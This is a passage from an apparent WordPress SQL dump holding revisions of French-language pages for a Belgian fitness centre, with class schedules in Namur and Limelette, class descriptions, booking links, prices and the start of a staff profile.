'361-revision-v1', '', '', '2014-02-09 20:36:26', '2014-02-09 20:36:26', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
(430, 1, '2014-02-09 20:37:08', '2014-02-09 20:37:08', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1>&nbsp;</h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\">http://reservation.crosstrainingcenter.be</a>\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-02-09 20:37:08', '2014-02-09 20:37:08', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(432, 1, '2014-02-09 20:39:58', '2014-02-09 20:39:58', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1>&nbsp;</h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-02-09 20:39:58', '2014-02-09 20:39:58', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(431, 1, '2014-02-09 20:38:59', '2014-02-09 20:38:59', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1>&nbsp;</h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-02-09 20:38:59', '2014-02-09 20:38:59', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(433, 1, '2014-02-09 20:41:07', '2014-02-09 20:41:07', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 3 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"trip\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline; background: #A9F5F2;\"><strong>Cardio</strong></span>: Circuit permettant de développer votre endurance musculaire et cardiovasculaire! Idéal pour brûler un maximum de calories et perdre du poids (conseillé avec un programme alimentaire)!\r\n\r\n<span style=\"text-decoration: underline; background: #A9F5A9;\"><strong>Circuit training</strong></span>: Travaillez de manière fun sur un circuit ultra-complet, accessible à tous et adapté à votre niveau! Relevez des challenges et augmentez votre confiance en vous!\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>Renforcement musculaire</strong></span>: Excellent circuit pour raffermir, muscler votre corps en profondeur avec ou sans prise de volume! Vous utiliserez entre autre le TRX suspension training (méthode d\'entrainement révolutionnaire basée sur le poids du corps), le Rip Trainer, le kettlebell...\r\n<h1>&nbsp;</h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-revision-v1', '', '', '2014-02-09 20:41:07', '2014-02-09 20:41:07', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
(436, 1, '2014-02-17 17:59:59', '2014-02-17 17:59:59', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" 